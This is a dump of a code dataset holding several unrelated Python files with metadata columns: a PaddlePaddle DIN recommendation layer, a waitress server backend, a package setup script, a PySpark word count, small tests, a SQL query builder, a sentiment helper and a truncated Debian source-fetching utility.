self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.target_item_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.target_cat_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.target_item_seq_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.target_cat_seq_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.item_b_attr = paddle.nn.Embedding(
self.item_count,
1,
sparse=self.is_sparse,
weight_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.attention_layer = []
sizes = [(self.item_emb_size + self.cat_emb_size) * 4
] + [80] + [40] + [1]
acts = ["sigmoid" for _ in range(len(sizes) - 2)] + [None]
for i in range(len(sizes) - 1):
linear = paddle.nn.Linear(
in_features=sizes[i],
out_features=sizes[i + 1],
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linear_%d' % i, linear)
self.attention_layer.append(linear)
if acts[i] == 'sigmoid':
act = paddle.nn.Sigmoid()
self.add_sublayer('act_%d' % i, act)
self.attention_layer.append(act)
self.con_layer = []
self.firInDim = self.item_emb_size + self.cat_emb_size
self.firOutDim = self.item_emb_size + self.cat_emb_size
linearCon = paddle.nn.Linear(
in_features=self.firInDim,
out_features=self.firOutDim,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linearCon', linearCon)
self.con_layer.append(linearCon)
conDim = self.item_emb_size + self.cat_emb_size + self.item_emb_size + self.cat_emb_size
conSizes = [conDim] + [80] + [40] + [1]
conActs = ["sigmoid" for _ in range(len(conSizes) - 2)] + [None]
for i in range(len(conSizes) - 1):
linear = paddle.nn.Linear(
in_features=conSizes[i],
out_features=conSizes[i + 1],
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linear_%d' % i, linear)
self.con_layer.append(linear)
if conActs[i] == 'sigmoid':
act = paddle.nn.Sigmoid()
self.add_sublayer('act_%d' % i, act)
self.con_layer.append(act)
def forward(self, hist_item_seq, hist_cat_seq, target_item, target_cat,
label, mask, target_item_seq, target_cat_seq):
hist_item_emb = self.hist_item_emb_attr(hist_item_seq)
hist_cat_emb = self.hist_cat_emb_attr(hist_cat_seq)
target_item_emb = self.target_item_emb_attr(target_item)
target_cat_emb = self.target_cat_emb_attr(target_cat)
target_item_seq_emb = self.target_item_seq_emb_attr(target_item_seq)
target_cat_seq_emb = self.target_cat_seq_emb_attr(target_cat_seq)
item_b = self.item_b_attr(target_item)
hist_seq_concat = paddle.concat([hist_item_emb, hist_cat_emb], axis=2)
target_seq_concat = paddle.concat(
[target_item_seq_emb, target_cat_seq_emb], axis=2)
target_concat = paddle.concat(
[target_item_emb, target_cat_emb], axis=1)
concat = paddle.concat(
[
hist_seq_concat, target_seq_concat,
hist_seq_concat - target_seq_concat,
hist_seq_concat * target_seq_concat
],
axis=2)
for attlayer in self.attention_layer:
concat = attlayer(concat)
atten_fc3 = concat + mask
atten_fc3 = paddle.transpose(atten_fc3, perm=[0, 2, 1])
atten_fc3 = paddle.scale(atten_fc3, scale=self.firInDim**-0.5)
weight = paddle.nn.functional.softmax(atten_fc3)
output = paddle.matmul(weight, hist_seq_concat)
output = paddle.reshape(output, shape=[0, self.firInDim])
for firLayer in self.con_layer[:1]:
concat = firLayer(output)
embedding_concat = paddle.concat([concat, target_concat], axis=1)
for colayer in self.con_layer[1:]:
embedding_concat = colayer(embedding_concat)
logit = embedding_concat + item_b
return logit
| # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.nn import Conv1D
import paddle
import paddle.nn as nn
import math
import numpy as np
class DINLayer(nn.Layer):
def __init__(self, item_emb_size, cat_emb_size, act, is_sparse,
use_DataLoader, item_count, cat_count):
super(DINLayer, self).__init__()
self.item_emb_size = item_emb_size
self.cat_emb_size = cat_emb_size
self.act = act
self.is_sparse = is_sparse
self.use_DataLoader = use_DataLoader
self.item_count = item_count
self.cat_count = cat_count
self.hist_item_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.hist_cat_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.target_item_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.target_cat_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.target_item_seq_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.target_cat_seq_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.item_b_attr = paddle.nn.Embedding(
self.item_count,
1,
sparse=self.is_sparse,
weight_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.attention_layer = []
sizes = [(self.item_emb_size + self.cat_emb_size) * 4
] + [80] + [40] + [1]
acts = ["sigmoid" for _ in range(len(sizes) - 2)] + [None]
for i in range(len(sizes) - 1):
linear = paddle.nn.Linear(
in_features=sizes[i],
out_features=sizes[i + 1],
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linear_%d' % i, linear)
self.attention_layer.append(linear)
if acts[i] == 'sigmoid':
act = paddle.nn.Sigmoid()
self.add_sublayer('act_%d' % i, act)
self.attention_layer.append(act)
self.con_layer = []
self.firInDim = self.item_emb_size + self.cat_emb_size
self.firOutDim = self.item_emb_size + self.cat_emb_size
linearCon = paddle.nn.Linear(
in_features=self.firInDim,
out_features=self.firOutDim,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linearCon', linearCon)
self.con_layer.append(linearCon)
conDim = self.item_emb_size + self.cat_emb_size + self.item_emb_size + self.cat_emb_size
conSizes = [conDim] + [80] + [40] + [1]
conActs = ["sigmoid" for _ in range(len(conSizes) - 2)] + [None]
for i in range(len(conSizes) - 1):
linear = paddle.nn.Linear(
in_features=conSizes[i],
out_features=conSizes[i + 1],
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linear_%d' % i, linear)
self.con_layer.append(linear)
if conActs[i] == 'sigmoid':
act = paddle.nn.Sigmoid()
self.add_sublayer('act_%d' % i, act)
self.con_layer.append(act)
def forward(self, hist_item_seq, hist_cat_seq, target_item, target_cat,
label, mask, target_item_seq, target_cat_seq):
hist_item_emb = self.hist_item_emb_attr(hist_item_seq)
hist_cat_emb = self.hist_cat_emb_attr(hist_cat_seq)
target_item_emb = self.target_item_emb_attr(target_item)
target_cat_emb = self.target_cat_emb_attr(target_cat)
target_item_seq_emb = self.target_item_seq_emb_attr(target_item_seq)
target_cat_seq_emb = self.target_cat_seq_emb_attr(target_cat_seq)
item_b = self.item_b_attr(target_item)
hist_seq_concat = paddle.concat([hist_item_emb, hist_cat_emb], axis=2)
target_seq_concat = paddle.concat(
[target_item_seq_emb, target_cat_seq_emb], axis=2)
target_concat = paddle.concat(
[target_item_emb, target_cat_emb], axis=1)
concat = paddle.concat(
[
hist_seq_concat, target_seq_concat,
hist_seq_concat - target_seq_concat,
hist_seq_concat * target_seq_concat
],
axis=2)
for attlayer in self.attention_layer:
concat = attlayer(concat)
atten_fc3 = concat + mask
atten_fc3 = paddle.transpose(atten_fc3, perm=[0, 2, 1])
atten_fc3 = paddle.scale(atten_fc3, scale=self.firInDim**-0.5)
weight = paddle.nn.functional.softmax(atten_fc3)
output = paddle.matmul(weight, hist_seq_concat)
output = paddle.reshape(output, shape=[0, self.firInDim])
for firLayer in self.con_layer[:1]:
concat = firLayer(output)
embedding_concat = paddle.concat([concat, target_concat], axis=1)
for colayer in self.con_layer[1:]:
embedding_concat = colayer(embedding_concat)
logit = embedding_concat + item_b
return logit | en | 0.85686 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. | 1.987767 | 2 |
minipylib/server/backends/waitress_server.py | kefin/minipylib | 0 | 6614036 | # -*- coding: utf-8 -*-
"""
minipylib.server.backends.waitress_server
Define a wsgi server object based on waitress.
"""
# created: 2014-08-30 <NAME> <<EMAIL>>
# updated: 2014-08-30 kchan
from __future__ import (absolute_import, unicode_literals)
from minipylib.server.backends.base import Server
try:
import waitress
class WaitressServer(Server):
"""
Waitress server.
Waitress is meant to be a production-quality pure-Python WSGI
server with very acceptable performance. It has no
dependencies except ones which live in the Python standard
library. It runs on CPython on Unix and Windows under Python
2.6+ and Python 3.2+. It is also known to run on PyPy 1.6.0 on
UNIX. It supports HTTP/1.0 and HTTP/1.1.
:source: https://waitress.readthedocs.org/
"""
name = 'waitress'
def run(self):
host, port = self.config.bind_addr
self.server = waitress.serve
try:
self.server(self.config.app, host=host, port=port)
except KeyboardInterrupt:
self.stop()
except ImportError:
pass
| # -*- coding: utf-8 -*-
"""
minipylib.server.backends.waitress_server
Define a wsgi server object based on waitress.
"""
# created: 2014-08-30 <NAME> <<EMAIL>>
# updated: 2014-08-30 kchan
from __future__ import (absolute_import, unicode_literals)
from minipylib.server.backends.base import Server
try:
import waitress
class WaitressServer(Server):
"""
Waitress server.
Waitress is meant to be a production-quality pure-Python WSGI
server with very acceptable performance. It has no
dependencies except ones which live in the Python standard
library. It runs on CPython on Unix and Windows under Python
2.6+ and Python 3.2+. It is also known to run on PyPy 1.6.0 on
UNIX. It supports HTTP/1.0 and HTTP/1.1.
:source: https://waitress.readthedocs.org/
"""
name = 'waitress'
def run(self):
host, port = self.config.bind_addr
self.server = waitress.serve
try:
self.server(self.config.app, host=host, port=port)
except KeyboardInterrupt:
self.stop()
except ImportError:
pass
| en | 0.819215 | # -*- coding: utf-8 -*- minipylib.server.backends.waitress_server Define a wsgi server object based on waitress. # created: 2014-08-30 <NAME> <<EMAIL>> # updated: 2014-08-30 kchan Waitress server. Waitress is meant to be a production-quality pure-Python WSGI server with very acceptable performance. It has no dependencies except ones which live in the Python standard library. It runs on CPython on Unix and Windows under Python 2.6+ and Python 3.2+. It is also known to run on PyPy 1.6.0 on UNIX. It supports HTTP/1.0 and HTTP/1.1. :source: https://waitress.readthedocs.org/ | 2.239484 | 2 |
setup.py | Nikeshbajaj/spk | 9 | 6614037 | import setuptools
import os
with open("README.md", "r") as fh:
long_description = fh.read()
top_dir, _ = os.path.split(os.path.abspath(__file__))
if os.path.isfile(os.path.join(top_dir, 'Version')):
with open(os.path.join(top_dir, 'Version')) as f:
version = f.readline().strip()
else:
import urllib
Vpath = 'https://raw.githubusercontent.com/Nikeshbajaj/spkit/master/Version'
version = urllib.request.urlopen(Vpath).read().strip().decode("utf-8")
setuptools.setup(
name="spkit",
version= version,
author="<NAME>",
author_email="<EMAIL>",
description="SpKit: Signal Processing toolkit | <NAME> |",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://spkit.github.io",
download_url = 'https://github.com/Nikeshbajaj/spkit/tarball/' + version,
packages=setuptools.find_packages(),
license = 'MIT',
keywords = 'Signal processing machine-learning entropy Rényi Kullback–Leibler divergence mutual information decision-tree logistic-regression naive-bayes LFSR ICA EEG-signal-processing ATAR',
classifiers=[
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Natural Language :: English',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
'Development Status :: 5 - Production/Stable',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Multimedia',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
'Topic :: Multimedia :: Sound/Audio :: Speech',
'Topic :: Scientific/Engineering :: Image Processing',
'Topic :: Scientific/Engineering :: Visualization',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Development Status :: 5 - Production/Stable',
],
project_urls={
'Documentation': 'https://spkit.readthedocs.io/',
'Say Thanks!': 'https://github.com/Nikeshbajaj',
'Source': 'https://github.com/Nikeshbajaj/spkit',
'Tracker': 'https://github.com/Nikeshbajaj/spkit/issues',
},
include_package_data=True,
install_requires=['numpy','matplotlib','scipy','scikit-learn','python-picard']
)
| import setuptools
import os
with open("README.md", "r") as fh:
long_description = fh.read()
top_dir, _ = os.path.split(os.path.abspath(__file__))
if os.path.isfile(os.path.join(top_dir, 'Version')):
with open(os.path.join(top_dir, 'Version')) as f:
version = f.readline().strip()
else:
import urllib
Vpath = 'https://raw.githubusercontent.com/Nikeshbajaj/spkit/master/Version'
version = urllib.request.urlopen(Vpath).read().strip().decode("utf-8")
setuptools.setup(
name="spkit",
version= version,
author="<NAME>",
author_email="<EMAIL>",
description="SpKit: Signal Processing toolkit | <NAME> |",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://spkit.github.io",
download_url = 'https://github.com/Nikeshbajaj/spkit/tarball/' + version,
packages=setuptools.find_packages(),
license = 'MIT',
keywords = 'Signal processing machine-learning entropy Rényi Kullback–Leibler divergence mutual information decision-tree logistic-regression naive-bayes LFSR ICA EEG-signal-processing ATAR',
classifiers=[
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Natural Language :: English',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
'Development Status :: 5 - Production/Stable',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Multimedia',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
'Topic :: Multimedia :: Sound/Audio :: Speech',
'Topic :: Scientific/Engineering :: Image Processing',
'Topic :: Scientific/Engineering :: Visualization',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Development Status :: 5 - Production/Stable',
],
project_urls={
'Documentation': 'https://spkit.readthedocs.io/',
'Say Thanks!': 'https://github.com/Nikeshbajaj',
'Source': 'https://github.com/Nikeshbajaj/spkit',
'Tracker': 'https://github.com/Nikeshbajaj/spkit/issues',
},
include_package_data=True,
install_requires=['numpy','matplotlib','scipy','scikit-learn','python-picard']
)
| none | 1 | 1.433681 | 1 | |
MapReduce_Examples/WordCount_Spark/Run_Spark_for_WordCount.py | sammath/Coursera | 0 | 6614038 |
#----------------------------------------------
# This code is written in ipython pySpark shell
#-----------------------------------------------
# You can either read text into your Spark from local fileSystem:
mySample_text_RDD = sc.textFile("file///directory_to_your_sample_text")
# Or you can read from HDFS(dont forget to put your sample text into hdfs!)
mySample_text_RDD = sc.textFile("/directory_of_your_sample_text_in_HDFS/")
# You can see your first n line by the following command
mySample_text_RDD.take(n)
# Now mapper is as below:
def split_words(line):
return line.split()
def create_pair(word):
return (word, 1)
pairs_RDD = mySample_text_RDD.flatMap(split_words).map(create_pair)
# You can see your output by the following .collect() command
pairs_RDD.collect()
# Now Reducer is as short as follow:
def sum_counts(a,b):
return a+b
# Now run reducer
wordCounts_RDD = pairs_RDD.reduceByKey(sum_counts)
# Now lets se what we get as a result
wordCounts_RDD.collect()
|
#----------------------------------------------
# This code is written in ipython pySpark shell
#-----------------------------------------------
# You can either read text into your Spark from local fileSystem:
mySample_text_RDD = sc.textFile("file///directory_to_your_sample_text")
# Or you can read from HDFS(dont forget to put your sample text into hdfs!)
mySample_text_RDD = sc.textFile("/directory_of_your_sample_text_in_HDFS/")
# You can see your first n line by the following command
mySample_text_RDD.take(n)
# Now mapper is as below:
def split_words(line):
return line.split()
def create_pair(word):
return (word, 1)
pairs_RDD = mySample_text_RDD.flatMap(split_words).map(create_pair)
# You can see your output by the following .collect() command
pairs_RDD.collect()
# Now Reducer is as short as follow:
def sum_counts(a,b):
return a+b
# Now run reducer
wordCounts_RDD = pairs_RDD.reduceByKey(sum_counts)
# Now lets se what we get as a result
wordCounts_RDD.collect()
| en | 0.897025 | #---------------------------------------------- # This code is written in ipython pySpark shell #----------------------------------------------- # You can either read text into your Spark from local fileSystem: # Or you can read from HDFS(dont forget to put your sample text into hdfs!) # You can see your first n line by the following command # Now mapper is as below: # You can see your output by the following .collect() command # Now Reducer is as short as follow: # Now run reducer # Now lets se what we get as a result | 3.657421 | 4 |
tests/nodes/test_alert.py | limkokhian/beagle | 1,139 | 6614039 | from beagle.nodes import Alert, Domain
def test_create_alert():
alert = Alert(alert_name="foo", alert_data={"time": "foo"})
assert alert.alert_name == "foo"
assert alert.alert_data == {"time": "foo"}
def test_alerted_on():
alert = Alert(alert_name="foo", alert_data={"time": "foo"})
dom = Domain("foobar.com")
alert.alerted_on[dom].append(timestamp=1234)
assert {"timestamp": 1234} in alert.alerted_on[dom]
| from beagle.nodes import Alert, Domain
def test_create_alert():
alert = Alert(alert_name="foo", alert_data={"time": "foo"})
assert alert.alert_name == "foo"
assert alert.alert_data == {"time": "foo"}
def test_alerted_on():
alert = Alert(alert_name="foo", alert_data={"time": "foo"})
dom = Domain("foobar.com")
alert.alerted_on[dom].append(timestamp=1234)
assert {"timestamp": 1234} in alert.alerted_on[dom]
| none | 1 | 2.507783 | 3 | |
pylinsql/query.py | hunyadi/pylinsql | 0 | 6614040 | <filename>pylinsql/query.py
"""
Construct a SQL query from a Python expression.
"""
from __future__ import annotations
import functools
import inspect
import os.path
import sys
from dataclasses import dataclass
from types import CodeType
from typing import Generator, List, Type
from .base import DataClass, T
from .builder import Context, QueryBuilder, QueryBuilderArgs
from .core import EntityProxy, Query
from .decompiler import CodeExpression, CodeExpressionAnalyzer
def get_entity_types(sql_generator_expr: Generator) -> List[Type]:
if not inspect.isgenerator(sql_generator_expr):
raise TypeError(
f"expected a SQL generator expression but got: {type(sql_generator_expr)}"
)
entity = sql_generator_expr.gi_frame.f_locals[".0"]
if not isinstance(entity, EntityProxy):
raise TypeError("invalid SQL generator expression")
return entity.types
@functools.lru_cache
def _analyze_expression(code_object: CodeType) -> CodeExpression:
code_analyzer = CodeExpressionAnalyzer(code_object)
try:
return code_analyzer.get_expression()
except Exception as e:
path = code_object.co_filename
lineno = code_object.co_firstlineno
raise RuntimeError(
f'error parsing expression in file "{path}", line {lineno}'
) from e
@dataclass
class CacheInfo:
hits: int
misses: int
def cache_info() -> CacheInfo:
info = _analyze_expression.cache_info()
return CacheInfo(info.hits, info.misses)
def _query_builder_args(sql_generator_expr: Generator) -> QueryBuilderArgs:
if not inspect.isgenerator(sql_generator_expr):
raise TypeError(
f"expected a SQL generator expression but got: {type(sql_generator_expr)}"
)
# obtain AST representation of generator expression
code_expression = _analyze_expression(sql_generator_expr.gi_frame.f_code)
# get reference to caller's frame
package_root = os.path.dirname(__file__)
caller = frame = sys._getframe(2)
while frame:
if not frame.f_code.co_filename.startswith(package_root):
caller = frame
break
frame = frame.f_back
# build query context
context = Context(code_expression.local_vars, caller.f_locals, caller.f_globals)
source_arg = sql_generator_expr.gi_frame.f_locals[".0"]
# build SQL query
return QueryBuilderArgs(
source_arg,
context,
code_expression.conditional_expr,
code_expression.yield_expr,
)
def select(sql_generator_expr: Generator[T, None, None]) -> Query[T]:
"Builds a query expression corresponding to a SELECT SQL statement."
qba = _query_builder_args(sql_generator_expr)
builder = QueryBuilder()
return builder.select(qba)
def insert_or_select(
insert_obj: DataClass[T], sql_generator_expr: Generator[T, None, None]
) -> Query[T]:
"Builds a query expression corresponding to a combined SELECT or INSERT SQL statement."
qba = _query_builder_args(sql_generator_expr)
builder = QueryBuilder()
return builder.insert_or_select(qba, insert_obj)
| <filename>pylinsql/query.py
"""
Construct a SQL query from a Python expression.
"""
from __future__ import annotations
import functools
import inspect
import os.path
import sys
from dataclasses import dataclass
from types import CodeType
from typing import Generator, List, Type
from .base import DataClass, T
from .builder import Context, QueryBuilder, QueryBuilderArgs
from .core import EntityProxy, Query
from .decompiler import CodeExpression, CodeExpressionAnalyzer
def get_entity_types(sql_generator_expr: Generator) -> List[Type]:
if not inspect.isgenerator(sql_generator_expr):
raise TypeError(
f"expected a SQL generator expression but got: {type(sql_generator_expr)}"
)
entity = sql_generator_expr.gi_frame.f_locals[".0"]
if not isinstance(entity, EntityProxy):
raise TypeError("invalid SQL generator expression")
return entity.types
@functools.lru_cache
def _analyze_expression(code_object: CodeType) -> CodeExpression:
code_analyzer = CodeExpressionAnalyzer(code_object)
try:
return code_analyzer.get_expression()
except Exception as e:
path = code_object.co_filename
lineno = code_object.co_firstlineno
raise RuntimeError(
f'error parsing expression in file "{path}", line {lineno}'
) from e
@dataclass
class CacheInfo:
hits: int
misses: int
def cache_info() -> CacheInfo:
info = _analyze_expression.cache_info()
return CacheInfo(info.hits, info.misses)
def _query_builder_args(sql_generator_expr: Generator) -> QueryBuilderArgs:
if not inspect.isgenerator(sql_generator_expr):
raise TypeError(
f"expected a SQL generator expression but got: {type(sql_generator_expr)}"
)
# obtain AST representation of generator expression
code_expression = _analyze_expression(sql_generator_expr.gi_frame.f_code)
# get reference to caller's frame
package_root = os.path.dirname(__file__)
caller = frame = sys._getframe(2)
while frame:
if not frame.f_code.co_filename.startswith(package_root):
caller = frame
break
frame = frame.f_back
# build query context
context = Context(code_expression.local_vars, caller.f_locals, caller.f_globals)
source_arg = sql_generator_expr.gi_frame.f_locals[".0"]
# build SQL query
return QueryBuilderArgs(
source_arg,
context,
code_expression.conditional_expr,
code_expression.yield_expr,
)
def select(sql_generator_expr: Generator[T, None, None]) -> Query[T]:
"Builds a query expression corresponding to a SELECT SQL statement."
qba = _query_builder_args(sql_generator_expr)
builder = QueryBuilder()
return builder.select(qba)
def insert_or_select(
insert_obj: DataClass[T], sql_generator_expr: Generator[T, None, None]
) -> Query[T]:
"Builds a query expression corresponding to a combined SELECT or INSERT SQL statement."
qba = _query_builder_args(sql_generator_expr)
builder = QueryBuilder()
return builder.insert_or_select(qba, insert_obj)
| en | 0.741575 | Construct a SQL query from a Python expression. # obtain AST representation of generator expression # get reference to caller's frame # build query context # build SQL query | 2.431901 | 2 |
Analysis.py | JamesScharf/StockTwinVisualizer | 1 | 6614041 | import Scraper
import pickle
from textblob import TextBlob
def sentiments(corpus):
'''
Get average sentiment of a list of strings, or "documents"
Returns list of polarity (how positive/negative it is)
and subjectivity (how biased it is)
DOES NOT CALCULATE AVERAGE/MEDIAN/MODE
'''
polarity = []
subjectivity = []
for doc in corpus:
docBlob = TextBlob(doc)
polarity.append(docBlob.sentiment.polarity)
subjectivity.append(docBlob.sentiment.subjectivity)
return polarity, subjectivity
def sentimentTitles(oneStock):
corpus = oneStock.titles
return sentiments(corpus)
def sentimentSummaries(oneStock):
corpus = oneStock.summaries
return sentiments(corpus)
def sentimentNewsText(oneStock):
corpus = oneStock.texts
return sentiments(corpus)
def sentimentWikiReferences(oneStock):
corpus = oneStock.wikiReferences
return sentiments(corpus)
def sentimentWikiLinks(oneStock):
corpus = oneStock.sentimentWikiLinks
return sentiments(corpus)
def sentimentWikiSummary(oneStock):
corpus = oneStock.wikiSummary
return sentiments(corpus)
def sentimentWikiContent(oneStock):
corpus = [oneStock.wikiContent]
return sentiments(corpus)
def articleSentiments(stockList):
'''
The sentiment values come in an array over time
Sometimes they're reversed, so we need to reverse them to correct
'''
#arrays of arrays
titlePolarities = []
titleBias = []
textPolarities = []
textBias = []
for oneStock in stockList:
titlePolarity, titleSubj = sentimentTitles(oneStock)
titlePolarities.append(titlePolarity)
titleBias.append(titleSubj)
textPolarity, textSubj = sentimentNewsText(oneStock)
textPolarities.append(textPolarity)
textBias.append(textSubj)
return titlePolarities, titleBias, textPolarities, textBias | import Scraper
import pickle
from textblob import TextBlob
def sentiments(corpus):
'''
Get average sentiment of a list of strings, or "documents"
Returns list of polarity (how positive/negative it is)
and subjectivity (how biased it is)
DOES NOT CALCULATE AVERAGE/MEDIAN/MODE
'''
polarity = []
subjectivity = []
for doc in corpus:
docBlob = TextBlob(doc)
polarity.append(docBlob.sentiment.polarity)
subjectivity.append(docBlob.sentiment.subjectivity)
return polarity, subjectivity
def sentimentTitles(oneStock):
corpus = oneStock.titles
return sentiments(corpus)
def sentimentSummaries(oneStock):
corpus = oneStock.summaries
return sentiments(corpus)
def sentimentNewsText(oneStock):
corpus = oneStock.texts
return sentiments(corpus)
def sentimentWikiReferences(oneStock):
corpus = oneStock.wikiReferences
return sentiments(corpus)
def sentimentWikiLinks(oneStock):
corpus = oneStock.sentimentWikiLinks
return sentiments(corpus)
def sentimentWikiSummary(oneStock):
corpus = oneStock.wikiSummary
return sentiments(corpus)
def sentimentWikiContent(oneStock):
corpus = [oneStock.wikiContent]
return sentiments(corpus)
def articleSentiments(stockList):
'''
The sentiment values come in an array over time
Sometimes they're reversed, so we need to reverse them to correct
'''
#arrays of arrays
titlePolarities = []
titleBias = []
textPolarities = []
textBias = []
for oneStock in stockList:
titlePolarity, titleSubj = sentimentTitles(oneStock)
titlePolarities.append(titlePolarity)
titleBias.append(titleSubj)
textPolarity, textSubj = sentimentNewsText(oneStock)
textPolarities.append(textPolarity)
textBias.append(textSubj)
return titlePolarities, titleBias, textPolarities, textBias | en | 0.776762 | Get average sentiment of a list of strings, or "documents"
Returns list of polarity (how positive/negative it is)
and subjectivity (how biased it is)
DOES NOT CALCULATE AVERAGE/MEDIAN/MODE The sentiment values come in an array over time
Sometimes they're reversed, so we need to reverse them to correct #arrays of arrays | 2.80875 | 3 |
debile/utils/aget.py | LeoCavaille/debile | 0 | 6614042 | <filename>debile/utils/aget.py
# Copyright (c) 2012-2013 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from debile.utils import run_command
import deb822
import StringIO
import requests
import gzip
import os
SOURCE = "dists/{suite}/{section}/source/Sources.gz"
def dget(path):
out, err, ret = run_command(["dget", "-u", path])
if ret != 0:
print ret, err
raise Exception("DAMNIT; dget fucked us")
def aget(archive, suite, section, source, version):
url = "{archive}/{path}".format(
archive=archive,
path=SOURCE.format(suite=suite, section=section
))
